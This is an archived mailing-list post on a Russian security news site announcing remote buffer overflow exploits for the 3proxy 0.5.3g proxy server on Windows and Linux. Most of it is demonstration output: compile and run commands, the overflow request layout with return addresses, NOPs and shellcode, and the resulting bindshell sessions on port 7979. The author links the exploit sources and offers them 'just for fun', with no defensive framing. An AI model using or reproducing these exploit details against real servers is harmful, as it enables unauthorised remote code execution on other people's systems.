The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


3proxy[v0.5.3g]: (linux/win32 service) remote buffer overflow


<< Previous INDEX Search src / Print Next >>
Date: Sun, 29 Apr 2007 23:06:41 -0400 (EDT)
From: v9 <v9@fakehalo.us.>
To: [email protected]
Subject: 3proxy[v0.5.3g]: (linux/win32 service) remote buffer overflow
 exploits.
Message-ID: <Pine.LNX.4.58.0704292300420.9707@localhost.>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: antivirus-gw at tyumen.ru

just for fun...

original exploit references:
 http://fakehalo.us/x3proxy-win32.c
 http://fakehalo.us/x3proxy.c


 example(win32 service):
-------------------------------------------------------------------------

[v9@fhalo v9]$ gcc x3proxy-win32.c -o x3proxy-win32
[v9@fhalo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan
[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.
[*] by: vade79/v9 [email protected] (fakehalo/realhalo)

[*] target: desktop.fakehalo.lan:3128
[*] return address($eip/"CALL ESP"): 0x7c81518b
[*] attempting to connect: desktop.fakehalo.lan:3128.
[*] successfully connected: desktop.fakehalo.lan:3128.
[*] sending string:
[+]  GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n
[+]  Host: [FILLERx999]\n\n
[*] closing connection.

[*] attempting to connect: desktop.fakehalo.lan:7979.
[*] successfully connected: desktop.fakehalo.lan:7979.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


 example(linux):
-------------------------------------------------------------------------

[v9@fhalo v9]$ gcc x3proxy.c -o x3proxy
[v9@fhalo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c
[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit.
[*] by: vade79/v9 [email protected] (fakehalo/realhalo)

[*] target                      : XXXXXXX.net:3128
[*] shellcode type              : bindshell(port=7979)
[*] return address($eip)        : 0x0805333c(+0=0x0805333c)
[*] attempting to connect: XXXXXXX.net:3128.
[*] successfully connected: XXXXXXX.net:3128.
[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n"
[*] closing connection.

[*] attempting to connect: XXXXXXX.net:7979.
[*] successfully connected: XXXXXXX.net:7979.

Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686
Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux
uid=515(v9) gid=572(v9) groups=572(v9)



<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру